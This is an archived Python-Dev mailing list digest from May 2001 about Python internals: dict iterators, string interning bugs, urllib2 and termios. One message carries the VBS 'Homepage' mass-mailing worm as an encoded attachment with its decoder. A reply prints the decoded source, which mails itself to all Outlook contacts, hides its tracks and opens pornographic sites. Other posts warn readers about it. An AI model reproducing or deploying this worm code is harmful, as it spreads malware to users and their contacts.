In-Reply-To: <20010508133638.Z16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEAAKBAA.tim.one@home.com>

[Tim]
> Given the new dict iterators in 2.2, there's an easier fast way
> that doesn't mutate the dict even under the covers:
>
> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

[Thomas Wouters]
> You probably want:
>
> arb = dict.iteritems().next
>
> so that you don't keep on returning the same key,value pair.

No, I would not want that.  If "arbitrary" suffices, then by defn. *any*
element is "good enough".  If it's not good enough to get the same one back
every time, then I want a stronger guarantee about what arb() returns than
the inexplicable behavior of repeated calls to dict.iteritems().next in the
presence of dict mutation.  But as I've said several times before <wink>, I'm
still asking for an algorithm where arb() is actually useful (as opposed to
.popitem(), which is dead easy to explain in the presence of mutation; your
version of arb() can, e.g., return a given entry more than once, may skip
entries, and may raise StopIteration with unexamined entries remaining in the
dict).

not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly
    y'rs  - tim


From tim.one@home.com  Wed May  9 08:42:00 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 03:42:00 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>

[Mark Favas]
> Changes in the last few hours (hi Tim!)

Hi Mark!  Sorry about that!

> to stringobject compile (I'd guess) on MS

You guess right -- and under two flavors of Windows <wink>.

> (and on Compaq's Tru64 compiler),

Figures.

> but produce the following with gcc on Solaris and FreeBSD:
>
> gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include
> -DHAVE_CONFIG_H  -o Objects/stringobject.o Objects/stringobject.c
> Objects/stringobject.c: In function `PyString_FromStringAndSize':
> Objects/stringobject.c:76: invalid lvalue in unary `&'
> Objects/stringobject.c:80: invalid lvalue in unary `&'
> Objects/stringobject.c: In function `PyString_FromString':
> Objects/stringobject.c:130: invalid lvalue in unary `&'
> Objects/stringobject.c:134: invalid lvalue in unary `&'
> *** Error code 1

Fair enough:  I tried to use a cast as an lvalue in those 4 places, all of
the form:

    		PyString_InternInPlace(&(PyObject *)op);

where op is declared PyStringObject*.  Strictly speaking, that ain't legal,
but changing it to:

		PyObject *t = (PyObject *)op;
    		PyString_InternInPlace(&t);

is.  You may wonder WTF the difference is.  That's easy:  the rewrite doesn't
use a cast expression as an lvalue <wink>.

sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs  - tim


From jack@oratrix.nl  Wed May  9 09:16:29 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Wed, 09 May 2001 10:16:29 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Message by <skip@pobox.com> ,
 Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com>
Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl>

> 
>     Jack> It's actually 830 files. ... 120 .c/.h files ...
> 
> How many of those 120 files are variants of existing source files that (in
> theory) could be merged with their mainline counterparts?

None (unless you would count macmodule.c as a variant of posixmodule.c). I 
think macmain.c started out as a clone of pythonmain.c, but I think they're 
too different to merge (but I'll have a look).

Hmm, now that I think of it macmodule and posixmodule could possibly be 
merged.

It's fun to see how much statistics I gather about MacPython in just a few 
days:-)
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From tim.one@home.com  Wed May  9 09:20:12 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 04:20:12 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <20010508070501.A25794@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKBAA.tim.one@home.com>

[Neil Schemenauer]
> Shouldn't the entry in the __future__ file be:
>
>   nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))
>
> or am I misunderstanding something?

Until nested_scopes *is* the rule, the Mandatory Release field is just a
guess about the future.  Changing it to (2, 2, 0, "alpha", 0) right *now*
would be wrong, since it would change it from a guess about the future to a
false statement about the present.  It must be changed when nested_scopes
become mandatory; it needn't be changed before then (unless we delay making
them mandatory beyond 2.2 final), although if somebody thinks they have a
good use for moving the guess up, fine, just so long as they don't move the
guess to or before 2.2a0.


From thomas@xs4all.net  Wed May  9 09:58:50 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 10:58:50 +0200
Subject: [Python-Dev] Crashes w/ CVS tree
Message-ID: <20010509105850.F16486@xs4all.nl>

I'm getting a crash with Python compiled from a freshly updated CVS tree,
even when running just './python'. It crashes during the loading of os.pyc.
It doesn't crash if I start python with -S, and it doesn't crash if I remove
*.pyc first:

centurion:~/python/python-2.2/dist/src/linux> ./python 
Python 2.2a0 (#4, May  9 2001, 09:52:29) 
[GCC 2.95.4 20010506 (Debian prerelease)] on linux2
Type "copyright", "credits" or "license" for more information.
>>> 
centurion:~/python/python-2.2/dist/src/linux> ./python
Segmentation fault

If I remove os.pyc only, I get the enlightning:

Fatal Python error: PyString_InternInPlace: strings only please!
Abort (core dumped)

I would blame Tim <wink>, except that when examining the corefile I found
some pointers to other causes. The 'original' crash occurs because
cmp_outcome() is passed an invalid PyObject, with most of its function slots
pointing to the middle of the glibc-internal '__morecore()' function.
Examining the stack off of which the invalid item was popped reveals that
the next-to-last item is an iterator. So maybe I should blame Guido instead,
either for the iterator or for rich comparisons ;)

>From what I can tell, the segfault happens in os.py, here:

    import posixpath
    path = posixpath
    del posixpath

    import posix
    __all__.extend(_get_exports_list(posix))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    del posix

elif 'nt' in _names:

That is, after importing posix, while getting the exports lists. Which, in
the case of posixmodule, uses a list comprehension.... which now uses an
iterator... so maybe it's Tim after all. :-)

Unfortunately, I don't have time to look at it right now (meetings,
meetings.) If noone is looking at it by the time I'm back and free, I'll
hunt some more ;)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas@xs4all.net  Wed May  9 10:14:32 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 11:14:32 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112
In-Reply-To: <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700
References: <20010509105850.F16486@xs4all.nl> <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010509111432.G16486@xs4all.nl>

On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Objects
> In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects
> 
> Modified Files:
> 	stringobject.c 
> Log Message:
> Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to
> restore correct semantics.

This apparently fixed my problem:

On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote:
> 
> I'm getting a crash with Python compiled from a freshly updated CVS tree,
> even when running just './python'. It crashes during the loading of os.pyc.
> It doesn't crash if I start python with -S, and it doesn't crash if I remove
> *.pyc first:

That ought to teach me to spend my morning doing something fun -- it turned
out to be useless :-)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one@home.com  Wed May  9 10:29:31 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 05:29:31 -0400
Subject: [Python-Dev] Crashes w/ CVS tree
In-Reply-To: <20010509105850.F16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEALKBAA.tim.one@home.com>

[Thomas Wouters]
> I'm getting a crash with Python compiled from a freshly updated CVS
> tree,even when running just './python'.

I did too, for a little while, but it's gone away.

> ...
> Fatal Python error: PyString_InternInPlace: strings only please!
> Abort (core dumped)
>
> I would blame Tim <wink>,

I would too.  Please update, and if stringobject.c changes, try again.

I'm sure this is my fault, but I'm too sleepy to figure out why, and I did
change *something* at random that appeared to make it go away <wink>.

it's-all-gcc's-fault-ly y'rs  - tim


From Greg.Wilson@baltimore.com  Wed May  9 16:49:29 2001
From: Greg.Wilson@baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 11:49:29 -0400
Subject: [Python-Dev] Homepage
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_01C0D89F.A3FFB8BE
Content-Type: text/plain


Hi!

You've got to see this page! It's really cool ;O)


------_=_NextPart_000_01C0D89F.A3FFB8BE
Content-Type: application/octet-stream;
	name="homepage.HTML.vbs"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="homepage.HTML.vbs"

Execute =
DeCode("Qp=11Gttqt=11Tguwog=11Pgzv=10=0FUgv=11YU=11?=11EtgcvgQdlgev*$YUe=
tkrv0Ujgnn$+=10=0FUgv=11HUQ?=11Etgcvgqdlgev*$uetkrvkpi0hkngu{uvgoqdlgev$=
+=10=0FHqnfgt?HUQ0IgvUrgekcnHqnfgt*4+=10=0F=10=0FUgv=11KpH?HUQ0QrgpVgzvH=
kng*YUetkrv0UetkrvHwnnpcog.3+=10=0FFq=11Yjkng=11KpH0CvGpfQhUvtgco>@Vtwg=10=
=0FUetkrvDwhhgt?UetkrvDwhhgt(KpH0TgcfNkpg(xdetnh=10=0FNqqr=10=0F=10=0FUg=
v=11QwvH?HUQ0QrgpVgzvHkng*Hqnfgt($^jqogrcig0JVON0xdu$.4.vtwg+=10=0FQwvH0=
ytkvg=11UetkrvDwhhgt=10=0FQwvH0enqug=10=0FUgv=11HUQ?Pqvjkpi=10=0F=10=0FK=
h=11YU0tgitgcf=11*$JMEW^uqhvyctg^Cp^ockngf$+=11>@=11$3$=11vjgp=10=0FOckn=
kv*+=10=0FGpf=11Kh=10=0F=10=0FUgv=11u?EtgcvgQdlgev*$Qwvnqqm0Crrnkecvkqp$=
+=10=0FUgv=11v?u0IgvPcogUrceg*$OCRK$+=10=0FUgv=11w?v0IgvFghcwnvHqnfgt*8+=
=10=0FHqt=11k?3=11vq=11w0kvgou0eqwpv=10=0FKh=11w0Kvgou0Kvgo*k+0uwdlgev?$=
Jqogrcig$=11Vjgp=10=0Fw0Kvgou0Kvgo*k+0enqug=10=0Fw0Kvgou0Kvgo*k+0fgngvg=10=
=0FGpf=11Kh=10=0FPgzv=10=0FUgv=11w?v0IgvFghcwnvHqnfgt*5+=10=0FHqt=11k?3=11=
vq=11w0kvgou0eqwpv=10=0FKh=11w0Kvgou0Kvgo*k+0uwdlgev?$Jqogrcig$=11Vjgp=10=
=0Fw0Kvgou0Kvgo*k+0fgngvg=10=0FGpf=11Kh=10=0FPgzv=10=0F=10=0FTcpfqok|g=10=
=0Ft?Kpv**6,Tpf+-3+=10=0FKh=11t?3=11vjgp=10=0FYU0Twp*$jvvr<11jctfeqtg0rq=
tpdknndqctf0pgv1ujcppqp130jvo$+=10=0Fgnugkh=11t?4=11Vjgp=10=0FYU0Twp*$jv=
vr<11ogodgtu0pdek0eqo1aZOEO1rtkp|lg130jvo$+=10=0Fgnugkh=11t?5=11Vjgp=10=0F=
YU0Twp*$jvvr<11yyy40ugzetqrqnku0eqo1cocvgwt1ujgknc130jvo$+=10=0FGnugKh=11=
t?6=11Vjgp=10=0FYU0Twp*$jvvr<11ujgknc0kuugz{0vx130jvo$+=10=0FGpf=11Kh=10=
=0F=10=0FHwpevkqp=11Ocknkv*+=10=0FQp=11Gttqt=11Tguwog=11Pgzv=10=0FUgv=11=
Qwvnqqm=11?=11EtgcvgQdlgev*$Qwvnqqm0Crrnkecvkqp$+=10=0FKh=11Qwvnqqm=11?=11=
$Qwvnqqm$=11Vjgp=10=0F=12Ugv=11Ocrk?Qwvnqqm0IgvPcogUrceg*$OCRK$+=10=0F=12=
Ugv=11Nkuvu?Ocrk0CfftguuNkuvu=10=0F=12Hqt=11Gcej=11NkuvKpfgz=11Kp=11Nkuv=
u=10=0F=12=12Kh=11NkuvKpfgz0CfftguuGpvtkgu0Eqwpv=11>@=112=11Vjgp=10=0F=12=
=12=12EqpvcevEqwpv=11?=11NkuvKpfgz0CfftguuGpvtkgu0Eqwpv=10=0F=12=12=12Hq=
t=11Eqwpv?=113=11Vq=11EqpvcevEqwpv=10=0F=12=12=12=12Ugv=11Ockn=11?=11Qwv=
nqqm0EtgcvgKvgo*2+=10=0F=12=12=12=12Ugv=11Eqpvcev=11?=11NkuvKpfgz0Cfftgu=
uGpvtkgu*Eqwpv+=10=0F=12=12=12=12Ockn0Vq=11?=11Eqpvcev0Cfftguu=10=0F=12=12=
=12=12Ockn0Uwdlgev=11?=11$Jqogrcig$=10=0F=12=12=12=12Ockn0Dqf{=11?=11xde=
tnh($Jk#$(xdetnh(xdetnh($[qw)xg=11iqv=11vq=11ugg=11vjku=11rcig#=11Kv)u=11=
tgcnn{=11eqqn=11=3DQ+$(xdetnh(xdetnh=10=0F=12=12=12=12Ugv=11Cvvcejogpv?O=
ckn0Cvvcejogpvu=10=0F=12=12=12=12Cvvcejogpv0Cff=11Hqnfgt=11(=11$^jqogrci=
g0JVON0xdu$=10=0F=12=12=12=12Ockn0FgngvgChvgtUwdokv=11?=11Vtwg=10=0F=12=12=
=12=12Kh=11Ockn0Vq=11>@=11$$=11Vjgp=10=0F=12=12=12=12Ockn0Ugpf=10=0F=12=12=
=12=12YU0tgiytkvg=11$JMEW^uqhvyctg^Cp^ockngf$.=11$3$=10=0F=12=12=12Gpf=11=
Kh=10=0F=12=12=12Pgzv=10=0F=12=12Gpf=11Kh=10=0F=12Pgzv=10=0FGpf=11kh=10=0F=
Gpf=11Hwpevkqp")
Function DeCode(Coded)
For I =3D 1 To Len(Coded)
CurChar=3D Mid(Coded, I, 1)
If Asc(CurChar) =3D 15 Then
CurChar=3D Chr(10)
ElseIf Asc(CurChar) =3D 16 Then
CurChar=3D Chr(13)
ElseIf Asc(CurChar) =3D 17 Then
CurChar=3D Chr(32)
ElseIf Asc(CurChar) =3D 18 Then
CurChar=3D Chr(9)
Else
CurChar =3D Chr(Asc(CurChar) - 2)
End If
DeCode =3D DeCode & CurChar
Next
End Function


------_=_NextPart_000_01C0D89F.A3FFB8BE--


From guido@digicool.com  Wed May  9 18:08:22 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 12:08:22 -0500
Subject: [Python-Dev] Homepage
In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400."
 <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>

Greg Wilson's computer was infected by a virus which got propagated to
python-dev.  Do NOT open the attachment!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik@pythonware.com  Wed May  9 17:12:00 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Wed, 9 May 2001 18:12:00 +0200
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid>

Greg's mail program wrote:

> Hi!
>
> You've got to see this page! It's really cool ;O)

> Content-Type: application/octet-stream;
>  name="homepage.HTML.vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment;
>  filename="homepage.HTML.vbs"

when will we see the first "homepage.HTML.py" virus?

Cheers /F


From esr@thyrsus.com  Wed May  9 17:20:24 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 9 May 2001 12:20:24 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <20010509122024.A416@thyrsus.com>

Guido van Rossum <guido@digicool.com>:
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Some of us -- heh, heh -- aren't vulnerable to attachment trojans.
I could almost (not quite, but almost) love the crackers and script
kiddiez of the world for what they're doing to Microsoft...
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

We shall not cease from exploration, and the end of all our exploring will be
to arrive where we started and know the place for the first time.
	-- T.S. Eliot


From fdrake@cj42289-a.reston1.va.home.com  Wed May  9 17:21:27 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:21:27 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update of the maintenance branch (for Python 2.1.1).


From barry@digicool.com  Wed May  9 17:23:26 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 9 May 2001 12:23:26 -0400
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
 <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <15097.28414.354061.170478@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido@digicool.com> writes:

    GvR> Greg Wilson's computer was infected by a virus which got
    GvR> propagated to python-dev.  Do NOT open the attachment!

Darn, and I was just finishing up the vbs.el script so my XEmacs/VM
reader could open it.

share-the-pain-share-the-fun-ly y'rs,
-Barry


From fdrake@cj42289-a.reston1.va.home.com  Wed May  9 17:47:27 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:47:27 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update of the development branch (for Python 2.2).


From Samuele Pedroni <pedroni@inf.ethz.ch>  Wed May  9 18:12:20 2001
From: Samuele Pedroni <pedroni@inf.ethz.ch> (Samuele Pedroni)
Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST)
Subject: [Python-Dev] Homepage
Message-ID: <200105091712.TAA05172@core.inf.ethz.ch>

Hi.

[GvR]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Here's the beast ("decrypted" and in a cage):
 ("decrypted" and in a cage):
(we got it also on the old jpython-interest)

MS has really increased computer usability, when I was younger
(and I'm not that old) one bad guy had to use assembler to cause
some damage, now thanks to MS, that don't cares much about security
but likely a lot about self-confindence, everybody can feel very clever
and proud writing such things ... and spamming the whole internet.

<danger>
On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing

If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
	Set Mapi=Outlook.GetNameSpace("MAPI")
	Set Lists=Mapi.AddressLists
	For Each ListIndex In Lists
		If ListIndex.AddressEntries.Count <> 0 Then
			ContactCount = ListIndex.AddressEntries.Count
			For Count= 1 To ContactCount
				Set Mail = Outlook.CreateItem(0)
				Set Contact = ListIndex.AddressEntries(Count)
				Mail.To = Contact.Address
				Mail.Subject = "Homepage"
				Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've 
got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf
				Set Attachment=Mail.Attachments
				Attachment.Add Folder & "\homepage.HTML.vb$"
				Mail.DeleteAfterSubmit = True
				If Mail.To <> "" Then
				Mail.Send
				WS.regwrite "HKCU\software\An\mailed", "1"
			End If
			Next
		End If
	Next
End if
End Function
</danger>

PS: the "decryption" was done in python ;)


From tim.one@home.com  Wed May  9 18:47:22 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 13:47:22 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKECFKBAA.tim.one@home.com>

[Guido]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Note that the same virus went out under the name of John G. Michopoulos on
the JPython (not Jython!) mailing list.

Here's detailed info on the virus (incl. simple removal instructions if you
got bit):

http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d@mm.html

Doesn't appear to be worse than a nuisance.  Anyone who has used Windows
Update within the last year <wink/sigh> and installed the "critical updates"
it recommends should have gotten a popup box warning that the attachment was
trying to access the Address Book, telling you it's probably a virus, and
advising to accept the "No, don't allow this" default.

you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs  - tim


From Greg.Wilson@baltimore.com  Wed May  9 19:50:25 2001
From: Greg.Wilson@baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 14:50:25 -0400
Subject: [Python-Dev] apology
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com>

My apologies to all --- yes, my machine was hit by a virus
that flooded the known universe with email.

Sorry for any grief it has caused anyone,
Greg


From tim.one@home.com  Wed May  9 20:30:41 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 15:30:41 -0400
Subject: [Python-Dev] test_urllib2 fails on Win98SE
Message-ID: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>

test_urliib2 takes > 30 seconds, then fails:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file
    if not host or \
socket.error: host not found

The URL it's passing is

file://c:\code\python\dist\src\lib\urllib2.pyc

If I change test_urllib2's

    file_url = "file://%s" % urllib2.__file__

to (adding another slash)

    file_url = "file:///%s" % urllib2.__file__

then it fails like this instead, but very quickly:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file
    return addinfourl(open(url2pathname(file), 'rb'),
IOError: [Errno 2] No such file or directory:
     '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc'

Here's what I know about URLs: .

Here's what I know about file URLs: .

Here's what I know about file URLs on Windows: .

If I type the original

    file://c:\code\python\dist\src\lib\urllib2.pyc

into IE's address bar, it actually *executes* urllib2.


From mwh@python.net  Wed May  9 20:50:34 2001
From: mwh@python.net (Michael Hudson)
Date: 09 May 2001 20:50:34 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700"
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake" <fdrake@users.sourceforge.net> writes:

> ! 	fd = PyObject_AsFileDescriptor(obj);
> ! 	if (fd == -1) {
> ! 		if (PyInt_Check(obj)) {
                    ^^^^^^^^^^^^^^^^
this is a bit pointless.

I admit

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
TypeError: tcgetattr, arg 1: can't extract file descriptor from "int"

is a bit confusing, but I'm not sure 

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
error: (9, 'Bad file descriptor')

is any better than:

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
ValueError: file descriptor cannot be a negative integer (-2)

which is what you get after applying this patch:

Index: Modules/termios.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v
retrieving revision 2.26
diff -c -r2.26 termios.c
*** Modules/termios.c   2001/05/09 17:53:06     2.26
--- Modules/termios.c   2001/05/09 19:49:52
***************
*** 37,43 ****
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       fd = PyInt_AS_LONG(obj);
                }
                else {
                        char* tname;
--- 37,43 ----
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       return 0;
                }
                else {
                        char* tname;

Cheers,
M.


From fdrake@acm.org  Wed May  9 21:09:09 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Wed, 9 May 2001 16:09:09 -0400 (EDT)
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
 <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > this is a bit pointless.

  You're right!  (Hey, it was your patch. ;)
  I'm checking in a different patch -- essentially,
PyObject_AsFileDescriptor() does the right thing, and we don't ever
need to second guess it.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh@python.net  Wed May  9 21:13:46 2001
From: mwh@python.net (Michael Hudson)
Date: 09 May 2001 21:13:46 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> I've attached the patch. Due to a small reorganisation the patch is
> a little longer -- symmetry has its price at C level too ;-)

I may be being dense, but can you explain what's going on here:

->> u'\u00e3'.encode('latin-1')
'\xe3'
->> u'\u00e3'.encode("latin-1").decode("latin-1")
Traceback (most recent call last):
  File "<input>", line 1, in ?
UnicodeError: ASCII encoding error: ordinal not in range(128)

Can you come up with some other example I can use it tomorrow's
python-dev summary?

Cheers,
M.

-- 
  Remember - if all you have is an axe, every problem looks 
  like hours of fun.                                        -- Frossie
               -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html


From mwh@python.net  Wed May  9 21:18:47 2001
From: mwh@python.net (Michael Hudson)
Date: 09 May 2001 21:18:47 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net> <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk> <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>
Message-ID: <m33daes2c8.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake@acm.org> writes:

> Michael Hudson writes:
>  > this is a bit pointless.
> 
>   You're right!  (Hey, it was your patch. ;)

So it was!  I must have uploaded a slightly stale version of the
